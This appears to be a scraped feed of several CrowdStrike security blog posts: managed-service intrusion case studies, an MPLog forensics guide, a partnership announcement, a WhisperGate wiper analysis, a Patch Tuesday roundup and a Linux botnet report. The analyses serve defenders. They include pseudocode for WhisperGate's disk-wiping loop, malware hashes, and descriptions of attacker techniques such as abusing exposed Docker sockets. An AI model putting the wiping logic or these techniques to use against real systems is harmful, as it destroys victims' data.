🔒
There are new articles available, click to refresh the page.
Before yesterdayCrowdStrike

Better Together: The Power of Managed Cybersecurity Services in the Face of Pressing Global Security Challenges

The results from the 2021 Global Security Attitude Survey paint a bleak picture of how organizations globally are feeling about the cybersecurity landscape before them. Organizations are grappling with shortages of cybersecurity skills and a lack of capability to detect and contain intrusions in a timely way. This comes against a backdrop of persistent ransomware attacks, the increasing regularity of supply chain vulnerabilities and a large attack surface due to sustained high levels of remote work. 

Although these are legitimate concerns, the battle is not lost. Effective managed cybersecurity services that include continuous threat hunting and rapid response can provide organizations with an immediate injection of world-class capability to detect, disrupt and contain serious hands-on-security threats at speed and at scale.

“Trusted” Entry Points Are No Match for Human Hunters

Many survey respondents (84%) predict that supply chain attacks could become one of the biggest cyber threats facing their organization. This boils down to a fear of an adversary gaining access through a trusted channel and going undetected. Sophisticated attacks of this nature require a mix of automation and human expertise in the form of human-based threat hunting. One of the strengths of threat hunting is that the ability to quickly and decisively detect a threat is not contingent on the initial access vector. Whether initial access is achieved via a supply chain attack, a vulnerable public-facing application or another trusted entry point, CrowdStrike Falcon OverWatch™ remains vigilant in hunting for post-exploitation behavior that signals an interactive threat on an endpoint.

OverWatch recently uncovered interactive intrusion activity that followed the unintended download of a suspected backdoored Zsh installation file. Zsh is a legitimate Unix shell and was likely downloaded by the victim organization from a legitimate GitHub repository.

Upon download and installation of Zsh, a binary for the remote access utility NetSupport was executed. Concurrently, the malicious installer also attempted to download additional binaries and batch files from an external domain. OverWatch tracked the adversary as they leveraged NetSupport to execute PowerShell commands to download a malicious DLL and batch file from an adversary command-and-control (C2) server and execute basic network reconnaissance commands. Later investigation found that the malicious DLL was modified to include VBScript that, if loaded, would have attempted to disable and add a number of folder exclusions to a third-party security tool. 

This attempted intrusion highlights how adversaries abuse user trust in legitimate download locations and exploit public edit settings on numerous GitHub repositories. Fortunately for this victim organization, OverWatch’s continuous hunting quickly spotted the anomalous activity based on threat hunting leads and known indicators of compromise (IOCs). Based on this rapid detection, OverWatch provided the necessary context to the victim organization enabling them to take swift remedial action.

Managed threat hunting delivers the human element that is crucial in detecting and disrupting adversary activity designed to exploit trusted components in a victim environment. Unlike solutions based exclusively on automated technology, human hunters approach their analysis with informed skepticism. OverWatch looks for behaviors that are indicative of a malicious presence in an environment. While the application or user activity involved with initial access might fall within parameters that technology considers normal, hunting looks at the broader context to detect even the faintest traces of malicious follow-on activity.

OverWatch and Falcon Complete Combine Forces to Stop Ransomware in Its Tracks

The 2021 survey also revealed that the persistent threat of ransomware attacks remains organizations’ most pressing cybersecurity concern, a concern that is firmly based in their lived experience. Two-thirds of the organizations surveyed had fallen victim to at least one ransomware attack in the preceding 12 months. This highlights how critical it is for organizations to have comprehensive security solutions in place that ensure that ransomware attempts are met with swift and decisive action. 

OverWatch and CrowdStrike Falcon Complete™ recently disrupted a ransomware attempt against a victim organization’s domain controller. An affiliate of the LockBit ransomware as a service (RaaS), run by BITWISE SPIDER, targeted the domain controller by exploiting the Zerologon vulnerability. The adversary connected to the domain controller remotely from a host on the network that did not have Falcon coverage. Thanks to the Falcon platform’s rich telemetry on covered workloads and OverWatch’s proactive threat hunting, the attack was immediately detected. Within minutes, OverWatch identified the adversary’s presence and began investigating. 

Having leveraged the exploit to obtain domain admin privileges, the adversary undertook initial discovery actions and created a new domain account to facilitate persistence and lateral movement. In under 20 minutes, the adversary used their new domain account to move laterally, via RDP, to another domain controller on the network, where they changed the “administrator” account’s password. By this time, OverWatch hunters were already in direct communication and coordination with Falcon Complete responders to begin stopping the attack.

Less than 10 minutes after the breakout, the adversary deployed and attempted to execute a novel binary. Further analysis performed by the CrowdStrike Intelligence team found the binary to be a variant of LockBit 2.0. Thanks to the Falcon platform’s prevention capabilities, the attempted LockBit execution was prevented, ensuring that this CrowdStrike customer did not become another one of BITWISE SPIDER’s many victims.

A Bit About LockBit
LockBit is developed by an adversary that CrowdStrike Intelligence tracks as BITWISE SPIDER, who provides their ransomware to affiliates in a RaaS model. BITWISE SPIDER has recently and quickly become a significant player in the big game hunting (BGH) landscape. Their dedicated leak site (DLS) has received the highest number of victims posted each month since July 2021 compared to other adversary DLSs due to the growing popularity and effectiveness of LockBit 2.0.

The Falcon platform is finely tuned to identify known malicious behaviors associated with ransomware. Despite the novel nature of the binary used in this attempted intrusion, the Falcon platform anticipated and immediately prevented the unknown threat from executing using a combination of artificial intelligence, behavioral detection and machine learning algorithms. 

Meanwhile, OverWatch tracked the adversary at every turn, providing context-rich information about the adversary’s movements to Falcon Complete, whose responders notified the customer and rapidly performed their response. Falcon Complete began by rapidly network containing the affected hosts, completely cutting off the adversary’s remote access. They also disabled the domain account created by the adversary and deployed a custom IOC hash block across the entire environment for the observed LockBit variant. To further assist the customer, Falcon Complete analysts delivered specific recommendations for further hardening of the network, including guidance, removing the adversary-created account, resetting the affected “administrator” account and fully patching the compromised domain controller. 

Thanks to the unrivaled security combination of the Falcon platform and the OverWatch, CrowdStrike Intelligence and Falcon Complete teams, the adversary was thwarted. This coordinated response effectively stopped the intrusion before the customer suffered any significant impact — protecting them against a serious eCrime threat that is growing all too prevalent. 

The findings from last year’s survey prove that it is a matter of when, not if, an organization will fall victim to an attempted ransomware attack. Yet, respondents’ self-reported estimated time to detect an intrusion has increased to an average of 146 hours, or over 6 days. Having expert managed services on your side makes the difference when minutes matter. The combination of OverWatch’s unrivaled ability to uncover adversary activity and Falcon Complete’s expert and timely response is proven to disrupt ransomware attempts before the adversary can do damage.

Managed Services Plug the Skills Gap

Amid these persistent threats, organizations report difficulty in finding staff with the skills needed to establish and maintain a comprehensive security posture. Managed services can deliver an immediate injection of security capability that can begin to pay dividends from Day One. In fact, OverWatch regularly uncovers pre-existing intrusions during roll-out to new customer environments.

CrowdStrike’s managed services provide benefits that cannot easily be replicated with an in-house solution. Because CrowdStrike analysts have access to cloud-scale telemetry encompassing trillions of events per day, they have unparalleled visibility across the entire customer install base. This allows hunters to rapidly identify anomalous activity, which ensures every customer benefits from near-real time insights into active threats. Both OverWatch and Falcon Complete are powered by CrowdStrike’s global threat intelligence, bringing critical context to the detection and response process. Crucially, all of this is delivered with 24/7/365 coverage, providing comprehensive security when it is most needed: ALWAYS.

Finally, a partnership with CrowdStrike’s managed services equips organizations with round-the-clock access to elite resources. OverWatch’s expert hunters deliver context-rich alerts that empower organizations to rapidly contain threats and remediate their environments with confidence. For organizations leveraging the power of Falcon Complete, expert responders will work in lock-step with OverWatch threat hunters to rapidly and surgically remediate malicious activity on an organization’s behalf.

Managed services can be your fast track to a comprehensive, mature endpoint security program that equips you to face the most pressing global security challenges into 2022 and beyond.

Additional Resources

Mind the MPLog: Leveraging Microsoft Protection Logging for Forensic Investigations

20 January 2022 at 08:41

In an incident response investigation, CrowdStrike analysts use multiple data points to parse the facts of who, what, when and how. As part of that fact-finding mission, analysts investigating Windows systems leverage the Microsoft Protection Log (MPLog), a forensic artifact on Windows operating systems that offers a wealth of data to support forensic investigations. MPLog has proven to be beneficial in identifying process execution and file access on systems.  

To aid investigators everywhere, this blog post provides an overview of the MPLog files, offers examples of the data contained within and walks through a case study of RClone, a data exfiltration tool used by eCrime actors during ransomware attacks

What Is the MPLog?

The Microsoft Protection Log, or MPLog, is a plain-text log file generated by Windows Defender or Microsoft Security Essentials for troubleshooting purposes. This log can contain historical evidence of the following:

  • Process execution
  • Threats detected
  • Scan results and actions taken
  • Signature update versions
  • File existence

Where to Find the MPLogs

MPLog files are stored under the directory C:\ProgramData\Microsoft\Windows Defender\Support. In this directory you will find the file MPLog-*. The screenshot in Figure 1 provides an example of sample content.

Figure 1. Example MPLog location

Interpreting MPLog Data

There are several different event types present in this log file. Some examples are listed below.

Note: Log formatting for each event has changed over time, so depending on when the event was written, you may have more or fewer fields than explained below.

Estimated Impact Events

Estimated impact events are generated to log the estimated performance impact information of running software as part of Windows Defender. These events can show evidence of execution, file access and count of file access. Microsoft documentation on these events can be found here.

Example: 2020-06-14T20:11:42.880Z ProcessImageName: explorer.exe, TotalTime: 30, Count: 11, MaxTime: 15, MaxTimeFile: \Device\HarddiskVolume1\Users\Public\Desktop\PuTTY (64-bit).lnk->[CMDEmbedded], EstimatedImpact: 9%

Field Name Description Data
N/A Event time generated in UTC 2020-06-14T20:11:42.880Z
ProcessImageName Process image name explorer.exe
TotalTime The cumulative duration in milliseconds spent in scans of files accessed by this process 30
Count The number of scanned files accessed by this process 11
MaxTime The duration in milliseconds in the longest single scan of a file accessed by this process 15
MaxTimeFile The path of the file accessed by this process for which the longest scan of MaxTime duration was recorded \Device\HarddiskVolume1\Users\Public\Desktop\PuTTY (64-bit).lnk
EstimatedImpact The percentage of time spent in scans for files accessed by this process out of the period in which this process experienced scan activity 9%

Table 1: Estimated Impact Events

SDN Events

As part of Windows Defender’s cloud protection service, SDN events can show evidence of file existence on disk along with sha1 and sha2 hashes for the identified file. The following is an example of an SDN event:

Field Name Description Data
N/A File full path and name C:\ProgramData\badfile.exe
Sha1 SHA1 hash of file 876d0908145c822c06060413ecacc1baca97892c
Sha2 SHA256 hash of file 121b6ad75b3ead2a09e8bf6959423f6ce91239e0c062060aa948bb379f906534

Table 2. SDN events

Detection Events

These events can show evidence of file execution, process information and the Windows Defender street name for detection. 

Examples:

  • 2021-07-22T15:38:04.557Z DETECTION_ADD Ransom:Win32/Conti.ZA file:C:\ProgramData\badfile.exe
  • 2021-07-22T15:38:04.557Z DETECTION_ADD Ransom:Win32/Conti.ZA process:pid:100128,ProcessStart:132696072639875080
Field Name Description Data
N/A Event time generated in UTC 2021-07-22T15:38:04.557Z
N/A AV street name Win32/Conti.ZA
PID Process ID 100128
ProcessStart Process start time (WebKit/Chrome Timestamp) 132696072639875080
File File full path and name C:\ProgramData\badfile.exe

Table 3. Detection events

EMS Detection Events

As part of Windows Defender’s memory scanning engine, EMS detection events can show evidence of process injection.

Examples:

  • Engine:EMS scan for process: explorer pid: 6108, sigseq: 0x0, sendMemoryScanReport: 0, source: 1
  • Engine:EMS detection: HackTool:Win64/CobaltStrike.A!!CobaltStrike.A64, sigseq=0x0000C0C53E1F0B73, pid=6108
Field Name Description Data
N/A Process name explorer.exe
N/A AV street name HackTool:Win64/CobaltStrike.A!!CobaltStrike.A64
PID Process ID 6108

Table 4. EMS detection events

Rclone Case Study

In a recent ransomware incident, CrowdStrike leveraged MPLog data to gain more insight into the use of the file transfer utility Rclone, used by the threat actor for data exfiltration. MPLog data was used to identify which files the threat actor was targeting and the potential number of files exfiltrated. 

Like many ransomware incidents today, CrowdStrike identified evidence of potential data exfiltration prior to execution of the ransomware. This was evident from the presence of the Rclone utility and evidence of execution found on an encrypted system. Unfortunately, there was no telemetry from the system to say what the exact Rclone command parameters were. For those unfamiliar with Rclone, a typical command is as follows:

As seen in the sample command, the data targeted for exfiltration can be identified in the path information. Using a simple string search for the term “rclone.exe” CrowdStrike discovered the following hits in the MPLog file:

Combined with what we know about the Estimated Impact Events from Microsoft’s documentation, we can make several statements from this data: 

  1. rclone.exe executed with Pid 5244
  2. rclone.exe accessed 32,873 files 
    1. Windows Defender scanned 32,873 files that rclone.exe accessed
  3. rclone.exe accessed the file \Device\Mup\fileserver\VOL1\PRIVATE\HR\PAYROLL\<redacted>.exe 
    1. This is a file that Windows Defender took the longest time to scan that rclone.exe accessed

Conclusion

Additional research is needed to fully understand the details and additional potential  investigative value of the MPLog, but initial analysis and research show that this data can be valuable for assisting in forensic investigations to identify process execution and file access on systems. Especially in cases where anti-forensic measures are taken or other artifacts on disk become impacted, MPLog can help investigators pick up the pieces and tell the full story.

Additional Resources

CrowdStrike Powers MXDR by Deloitte, Offering Customers Risk Mitigation with Powerful Customized and Managed Security Services

20 January 2022 at 07:01

Deloitte, a leader in managed security services, has launched MXDR by Deloitte — a Managed Extended Detection and Response suite of offerings — within which the CrowdStrike Falcon® platform will power a number of solutions.

MXDR by Deloitte combines an integrated, composable and modular managed detection and response SaaS platform with managed security services in a unified offering of advanced, military-grade threat hunting, detection, response and remediation capabilities.

The CrowdStrike Falcon platform is one of the world’s most advanced cloud-native platforms for protecting critical areas of enterprise risk, including endpoints, cloud workloads, identity and data. The CrowdStrike Falcon platform provides highly standardized, cloud-delivered, effective and easy to use SaaS solutions.

“Many of our clients have dozens — if not hundreds — of security tools in their arsenals, which can be a challenge to manage. We developed MXDR by Deloitte to help organizations consolidate into one managed services and solutions suite to help improve ease, efficiency and effectiveness in cyber program management,” said Curt Aubley, MXDR by Deloitte leader and a Deloitte Risk & Financial Advisory managing director, Deloitte & Touche LLP. “We asked CrowdStrike to be part of our MXDR offering due to their technological capabilities and open API platform — both of which enable integration into our MXDR platform and scalability that Deloitte clients demand.”

Enhance Visibility, Improve Incident Response and Lower Operational Costs

Working together, CrowdStrike’s solutions and Deloitte’s advisory services are designed to help organizations identify security gaps, prioritize risk-mitigation initiatives and help improve their risk posture. In particular, CrowdStrike technologies in MXDR by Deloitte will focus on helping clients:

  1. Increase real-time multi-platform visibility for enterprise assets across on-premises, cloud and container workloads — including the capabilities to research common vulnerabilities and exposures (CVEs), examine threat actor profiles and targets, understand all applications running in their environment, and search to see versions, hosts and users that may pose a risk
  2. Improve mean time to prevent, detect, respond and mitigate vulnerabilities in security assets and related cyberattacks
  3. Reduce business costs through proactive identification and improved response efforts to unknown cyberattacks with additional benefits of consolidation, lowered complexity and total cost of ownership

With its newly expanded MXDR suite, Deloitte has positioned the CrowdStrike Falcon platform as a core enabling technology for multiple services in the MXDR suite and is adopting multiple CrowdStrike modules to power the services.  

Current MXDR by Deloitte service offerings leveraging CrowdStrike include: 

  • Cloud Security: Prevention, Detection and Response powered by Falcon Cloud Workload protection (CWP), Falcon Horizon™ cloud security posture management and Falcon Discover™ network security monitoring
  • Enterprise Prevention, Detection and Response powered by the CrowdStrike Falcon platform
  • Zero Trust: Identity Prevention, Detection and Response powered by Falcon Identity Threat Protection and Falcon Zero Trust
  • Insider Threat Detection powered by Falcon Identity Threat Protection
  • Adversary Pursuit: Proactive Hunting powered by Falcon OverWatch™ managed threat hunting
  • Attack Surface Management (ASM) and Vulnerability Management (VM) powered by Falcon Spotlight™ scanless vulnerability and Falcon Discover network security monitoring
  • Incident Response (IR): Contain and Recover powered by the CrowdStrike Falcon platform
  • Master Operator and Hunt Training powered by Falcon Insight™ endpoint detection and response and Falcon Prevent™ next-gen antivirus

In addition to CrowdStrike, Deloitte is also leveraging complementary strategic alliances with  Amazon Web Services (AWS), Google, Zscaler, Splunk, ServiceNow and Exabeam to operationalize its MXDR suite. CrowdStrike already has robust technical integrations across the other alliances involved, bringing multi-layered defense solutions to CrowdStrike customers. CrowdStrike is also currently the only EDR vendor included in the MXDR by Deloitte program.

“Organizations are still dealing with breaches day in and day out. This alliance helps enterprises better identify, prevent and respond to cyber threats by providing risk insights and protection to help enable better business decision making, from the security operations center to the boardroom,” states Matthew Polly, VP of WW Alliances, Channels and Business Development at CrowdStrike. “These new MXDR services from Deloitte offer customers best-of-breed holistic security risk and threat management, incident response and threat intelligence services to help organizations prevent, detect and mitigate potential cyberattacks.” 

Better Together: CrowdStrike and Deloitte

CrowdStrike and Deloitte are both dedicated to delivering best-in-class security solutions for our customers globally. This strategic alliance will further enable organizations to deploy powerful solutions to combat adversaries and ultimately help stop breaches.  

Learn more about CrowdStrike’s Falcon platform here.

Additional Resources

Technical Analysis of the WhisperGate Malicious Bootloader

19 January 2022 at 17:37

On Jan. 15, 2022, a set of malware dubbed WhisperGate was reported to have been deployed against Ukrainian targets. The incident is widely reported to contain three individual components deployed by the same adversary, including a malicious bootloader that corrupts detected local disks, a Discord-based downloader and a file wiper. The activity occurred at approximately the same time multiple websites belonging to the Ukrainian government were defaced.

This blog covers the malicious bootloader in more detail. 

Details

The installer component for the bootloader has an SHA256 hash of

a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92

and contains a build timestamp of 2022-01-10 10:37:18 UTC. It was built using MinGW, similar to the file-wiper component. This component overwrites the master boot record (MBR) of an infected host with a malicious 16-bit bootloader with a SHA256 hash of

44ffe353e01d6b894dc7ebe686791aa87fc9c7fd88535acc274f61c2cf74f5b8

that displays a ransom note when the host boots (Figure 1) and, at the same time, performs destructive operations on the infected host’s hard drives.

Figure 1. Fake ransom note

The destructive wiping operation has the following pseudocode:

for i_disk between 0 and total_detected_disk_count do
   for i_sector between 1 and total_disk_sector_count, i_sector += 199, do
      overwrite disk i_disk at sector i_sector with hardcoded data
   done
done

At periodic offsets, the bootloader overwrites sectors of an infected host’s entire hard drive, with a message similar to the ransom note, padded with additional bytes (Figure 2).

Figure 2. Hexadecimal dump of the pattern written to the disks of an infected host

The data consists of the string AAAAA, the index of the infected drive, the ransom note and the MBR footer magic value 55 AA, followed by two null bytes.

The bootloader accesses the disk via BIOS interrupt 13h in logical block addressing (LBA) mode and overwrites every 199th sector until the end of the disk is reached. After a disk is corrupted, the malware overwrites the next in the detected disk list. 

This process is unsophisticated but reminiscent of the more evolved implementation of NotPetya’s malicious MBR that masqueraded as the legitimate chkdsk disk-repair utility while actually corrupting the infected host’s file system.

The bootloader installer does not initiate a reboot of the infected system, as has been observed in past intrusions such as BadRabbit and NotPetya. The lack of forced reboot suggests the threat actor took other steps to initiate it (e.g., via a different implant) or decided to let users perform the reboot themselves. A delayed reboot may allow other components of the WhisperGate intrusion to run (e.g., the file wiper).

Assessment

The WhisperGate bootloader malware complements its file-wiper counterpart. Both aim to irrevocably corrupt the infected hosts’ data and attempt to masquerade as genuine modern ransomware operations. However, the WhisperGate bootloader has no decryption or data-recovery mechanism, and has inconsistencies with malware commonly deployed in ransomware operations. 

The displayed message suggests victims can expect recovery of their data, but this is technically unachievable. These inconsistencies very likely indicate that WhisperGate activity aims to destroy data on the impacted assets. This assessment is made with moderate confidence as technical analysis of the WhisperGate activity continues.

The activity is reminiscent of VOODOO BEAR’s destructive NotPetya malware, which included a component impersonating the legitimate chkdsk utility after a reboot and corrupted the infected host’s Master File Table (MFT) — a critical component of Microsoft’s NTFS file system. However, the WhisperGate bootloader is less sophisticated, and no technical overlap could currently be identified with VOODOO BEAR operations.

CrowdStrike Intelligence Confidence Assessment 

High Confidence: Judgments are based on high-quality information from multiple sources. High confidence in the quality and quantity of source information supporting a judgment does not imply that that assessment is an absolute certainty or fact. The judgment still has a marginal probability of being inaccurate.

Moderate Confidence: Judgments are based on information that is credibly sourced and plausible, but not of sufficient quantity or corroborated sufficiently to warrant a higher level of confidence. This level of confidence is used to express that judgments carry an increased probability of being incorrect until more information is available or corroborated.

Low Confidence: Judgments are made where the credibility of the source is uncertain, the information is too fragmented or poorly corroborated enough to make solid analytic inferences, or the reliability of the source is untested. Further information is needed for corroboration of the information or to fill known intelligence gaps.

Additional Resources

January 2022 Patch Tuesday: Multiple Critical Vulnerabilities and Microsoft Exchange Remote Code Execution

14 January 2022 at 12:37

Kicking off the first Patch Tuesday of 2022, CrowdStrike continues to provide research and analysis regarding critically rated vulnerabilities and the subsequent patches offered by Microsoft. In this month’s updates we see the lion’s share of updates directed at Microsoft’s Windows and Extended Security Update (ESU) products, while other patches target lesser-known components of Microsoft’s operating system. What is noticeably missing this month is a patch for any in-the-wild exploited vulnerabilities, as there have been several in recent months. 

We also discuss three Microsoft Exchange remote code execution vulnerabilities that received updates. If you recall, Microsoft Exchange was involved in a massive exploitation campaign in early 2021. Prioritizing these patches should be strongly considered if your organization relies on this product. 

New Patches for 97 Vulnerabilities

This month’s Patch Tuesday update includes fixes for 97 vulnerabilities. Combined with the 29 vulnerabilities that received out-of-band (OOB) updates at the start of January, this first month of 2022 has a total of 126 patched updates. On its own, that number isn’t too surprising, given the Log4j vulnerabilities SecOps staff have to deal with (see the CrowdStrike Log4j Resource Center for more information) but the updates from Microsoft are certainly needed, as SecOps still remain pressed for time when it comes to mitigation and remediation. 

Similar to risk analysis for the past three months, the top two attack types for Microsoft products continue to be privilege elevation and remote code execution. The third primary attack type alternates between information disclosure and denial of service.

However, unlike the last two months of updates — where patches were spread more evenly across product families — this month we see the large majority of updates concentrated on Windows products and Extended Security Updates (ESU) products. Consider focusing your patching based on the family of Windows products your organization uses.

Figure 1. Breakdown of January 2022 Patch Tuesday attack types

Figure 2. Breakdown of January 2022 Patch Tuesday affected product families

Remote Code Execution and Elevation of Privilege Dominate as Attack Types for January’s Critical Vulnerabilities

This month, a number of vulnerabilities have a CVSS score of 8.8 or higher affecting various Microsoft products. Remember, the criticality of a CVSS score alone should not be the only determining factor in your prioritization process. A combination of various data points, attacker information and news reports could change how severe or critical that score may be for your organization. (Falcon Spotlight™ ExPRT.AI can help your staff quickly identify what’s truly critical and relevant to your organization.) However, CrowdStrike analysis shows that among this month’s critically ranked vulnerabilities, two attack types — remote code execution and privilege escalation — are particularly attractive methods, allowing attackers to gain a foothold in affected systems.

CVE-2022-21849: This remote code execution vulnerability affects the Internet Key Exchange. It can be leveraged with an unauthenticated attacker that is able to run the IPSec Service. It’s been given the most Critical CVSS score of 9.8. 

CVE-2022-21907: This vulnerability affecting the HTTP Protocol Stack is also ranked as Critical this month. This vulnerability impacts the Windows Operating System in Windows 10 and Windows Server 2019, but the HTTP Trailer Support feature — which is the vulnerable component — is not enabled by default. There may be additional manual validation that your SecOps staff should perform. It should be noted that this vulnerability is remotely exploitable on older versions of the operating system, which could open the door for self-propagating malware to exploit it.

CVE-2022-21901: This vulnerability is exploited via privilege escalation. Attackers exploit this Windows Hyper-V vulnerability by executing a specially crafted application on a vulnerable system. If successful, an attacker could potentially interact with processes of another Hyper-V guest hosted on the same Hyper-V host.

The remaining vulnerabilities listed in the table below are executed via a Remote Procedure Call (RPC) Runtime for CVE-2022-21922 and a remote code execution attack type on Microsoft Office for CVE-2022-21840. For the latter vulnerability, it’s worth noting that this vulnerability affects Microsoft Office versions for macOS, Apple’s operating system. At the time of this month’s Microsoft Patch Tuesday release, there are no currently available patches for Apple Systems running Microsoft Office products.

Rank CVSS Score CVE Description
Critical 9.8 CVE-2022-21849 Windows IKE Extension Remote Code Execution Vulnerability
Critical 9.8 CVE-2022-21907 HTTP Protocol Stack Remote Code Execution Vulnerability
Critical 9 CVE-2022-21901 Windows Hyper-V Elevation of Privilege Vulnerability
Critical 8.8 CVE-2022-21922 Remote Procedure Call Runtime Remote Code Execution Vulnerability
Critical 8.8 CVE-2022-21840 Microsoft Office Remote Code Execution Vulnerability

Microsoft Exchange Remote Code Execution Vulnerabilities

Microsoft Exchange Server is a known objective for attackers. When vulnerabilities affecting this product are released, SecOps staff often face the pressure of patching them as soon as possible, especially if these servers are exposed to the internet. This month’s updates include fixes for three remote code execution vulnerabilities, all with a CVSS Score of 9.0 (see the table below). 

As we’re approaching the one year anniversary of the massive exploitation campaign that occurred against Microsoft Exchange Server, it’s important to keep an eye out for potential attack vectors. It’s paramount for SecOps teams to be able to identify vulnerable instances and patch them the first opportunity they have.

Of note, all of the CVEs listed in the table below have been flagged as the attack vector being “adjacent.” This means that this particular attack type cannot be executed across the internet, but it could be successful if an attacker has gained a foothold on any other machine in the network.

Rank CVSS Score CVE Description
Critical 9 CVE-2022-21846 Microsoft Exchange Server Remote Code Execution Vulnerability
Critical 9 CVE-2022-21855 Microsoft Exchange Server Remote Code Execution Vulnerability
Critical 9 CVE-2022-21969 Microsoft Exchange Server Remote Code Execution Vulnerability

Remote Desktop Protocol Vulnerabilities

Three remote code execution vulnerabilities received updates this month on Microsoft’s Remote Desktop Protocol. Two of them affect the client (CVE-2022-21850 and CVE-2022-21851), and one affects Remote Desktop Protocol (CVE-2022-21893).

To exploit CVE-2022-21850 and CVE-2022-21851, an attacker would need to persuade an authenticated user to connect to a malicious remote desktop server, enabling the attacker to then exploit the vulnerabilities via remote code execution. 

Similarly, to succeed in exploiting CVE-2022-21893, an attacker would need to convince the victim to connect to a vulnerable server, which would enable the attacker to read or tamper with clipboard contents on the victim’s machine to read the file system.

We reported two similar vulnerabilities in November 2021, and two information disclosure vulnerabilities and another remote code execution vulnerability in our December 2021 update.

Rank CVSS Score CVE Description
Critical 8.8 CVE-2022-21850 Remote Desktop Client Remote Code Execution Vulnerability
Critical 8.8 CVE-2022-21851

 

Remote Desktop Client Remote Code Execution Vulnerability
Critical 8.8 CVE-2022-21893 Remote Desktop Protocol Remote Code Execution Vulnerability

Other Critical and Important Vulnerabilities to Consider

Rank CVSS Score CVE Description
Critical 8.8 CVE-2022-21920 Windows Kerberos Elevation of Privilege Vulnerability
Important 7.0 CVE-2022-21882 Win32k Elevation of Privilege Vulnerability
Important 7.0 CVE-2022-21887 Win32k Elevation of Privilege Vulnerability
Important 5.5 CVE-2022-21876 Win32k Information Disclosure Vulnerability
Important 5.5 CVE-2022-21906 Windows Defender Application Control Security Feature Bypass Vulnerability
Important 4.4 CVE-2022-21921 Windows Defender Application Control Security Feature Bypass Vulnerability

Patch and Review Your Mitigation Strategy 

A layered security approach — with a heavy emphasis on tools, programs and solutions that create efficiency and quicken response time — is key to a defensible security posture for your organization. Vulnerabilities are found in a wide variety of Microsoft products and platforms, with attackers diligently working on more creative ways to access valuable systems and information. 

This month’s focus on Windows and ESU products underscores the value of a robust mitigation strategy for vulnerabilities that affect your organization’s critical systems where patches are not available. 

Security and operations teams need layered security and tools that help prevent, detect and identify vulnerabilities and guide them through their patching and assessment process. A quick mitigation strategy will help to reduce the windows of opportunity for attackers, helping companies to remain as secure as possible and prevent any potential breach.

Learn More

Watch this video on Falcon Spotlight™ vulnerability management to see how you can quickly monitor and prioritize vulnerabilities within the systems and applications in your organization.

About CVSS Scores

The Common Vulnerability Scoring System (CVSS) is a free and open industry standard that CrowdStrike and many other cybersecurity organizations use to assess and communicate software vulnerabilities’ severity and characteristics. The CVSS Base Score ranges from 0.0 to 10.0, and the National Vulnerability Database (NVD) adds a severity rating for CVSS scores. Learn more about vulnerability scoring in this article

Additional Resources 

Linux-Targeted Malware Increases by 35% in 2021: XorDDoS, Mirai and Mozi Most Prevalent

13 January 2022 at 12:04
  • Malware targeting Linux systems increased by 35% in 2021 compared to 2020
  • XorDDoS, Mirai and Mozi malware families accounted for over 22% of Linux-targeted threats observed by CrowdStrike in 2021
  • Ten times more Mozi malware samples were observed in 2021 compared to 2020

Malware targeting Linux-based operating systems, commonly deployed in Internet of Things (IoT) devices, have increased by 35% in 2021 compared to 2020, according to current CrowdStrike threat telemetry, with the top three malware families accounting for 22% of all Linux-based IoT malware in 2021. 

XorDDoS, Mirai and Mozi are the most prevalent Linux-based malware families observed in 2021, with Mozi registering a significant tenfold increase in the number of in-the-wild samples in 2021 compared to 2020. The primary purpose of these malware families is to compromise vulnerable internet-connected devices, amass them into botnets, and use them to perform distributed denial of service (DDoS) attacks

Linux-based Malware and IoT

Linux powers most of today’s cloud infrastructure and web servers, yet it also powers mobile and IoT devices. It’s popular because it offers scalability, security features and a wide range of distributions to support multiple hardware designs and great performance on any hardware requirements.

With various Linux builds and distributions at the heart of cloud infrastructures, mobile and IoT, it presents a massive opportunity for threat actors. For example, whether using hardcoded credentials, open ports or unpatched vulnerabilities, Linux-running IoT devices are a low-hanging fruit for threat actors — and their en masse compromise can threaten the integrity of critical internet services. More than 30 billion IoT devices are projected to be connected to the internet by the end of 2025, creating a potentially very large attack surface for threats and cybercriminals to create massive botnets.

A botnet is a network of compromised devices connected to a remote command-and-control (C2) center. It functions as a small cog in the larger network, and can infect other devices. Botnets are often used for DDoS attacks, spamming targets, gaining remote control and performing CPU-intensive activities like cryptomining. DDoS attacks use multiple internet-connected devices to access a specific service or gateway, preventing legitimate traffic from passing through by consuming the entire bandwidth, causing it to crash. 

The 2016 Mirai botnet incident serves as a reminder that a large number of seemingly benign devices performing a DDoS attack can disrupt critical internet services, affecting both organizations and average users.  

Top Linux Threats in Today’s Landscape

Analyzing the current Linux threat landscape, the XorDDoS, Mirai and Mozi malware families and variants have emerged as the most prolific in 2021, accounting for over 22% of all IoT Linux-targeting malware.

XorDDoS: 123% Increase in Malware Samples

XorDDoS is a Linux trojan compiled for multiple Linux architectures, ranging from ARM to x86 and x64. Its name is derived from using XOR encryption in malware and network communication to the C2 infrastructure. 

When targeting IoT devices, the trojan is known to use SSH brute-forcing attacks to gain remote control on vulnerable devices.

Fig. 1- Docker’s official documentation (Click to enlarge)

On Linux machines, some variants of XorDDoS show that its operators scan and search for Docker servers with the 2375 port open. This port offers an unencrypted Docker socket and remote root passwordless access to the host, which attackers can abuse to get root access to the machine.

CrowdStrike researchers have found that the number of XorDDoS malware samples throughout 2021 has increased by almost 123% compared to 2020.

Fig. 2 – Falcon detection for Linux XorDDoS malware sample (Click to enlarge)

Mozi: 10 Times More Prevalent in 2021

Mozi is a peer-to-peer (P2P) botnet network that utilizes the distributed hash table (DHT) system, implementing its own extended DHT. The distributed and decentralized lookup mechanism provided by DHT enables Mozi to hide C2 communication behind a large amount of legitimate DHT traffic.

Fig. 3 – Credits: Kn0wledge

The use of DHT is interesting because it allows Mozi to quickly grow a P2P network. And, because it uses an extension over DHT, it’s not correlated with normal traffic, so detecting the C2 communication becomes difficult.

Mozi infects systems by brute-forcing SSH and Telnet ports. It then blocks those ports so that it is not overwritten by other malicious actors or malware.

Fig. 4 – Falcon detection for Linux Mozi malware sample (Click to enlarge)

Mirai: The Common Ancestor

Mirai malware has made a name for itself in the last few years, especially after its developer published Mirai’s source code. Similar to Mozi, Mirai abuses weak protocols and weak passwords, such as Telnet, to compromise devices using brute-forcing attacks.

With multiple Mirai variants emerging since its source code became public, the Linux trojan can be considered the common ancestor to many of today’s Linux DDoS malware. While most variants add onto existing Mirai features or implement different communication protocols, at their core they share the same Mirai DNA.

Some of the most prevalent variants tracked by CrowdStrike researchers involve Sora, IZIH9  and Rekai. Compared to 2020, the numbers of identified samples for all three variants have increased by 33%, 39% and  83% respectively in 2021.

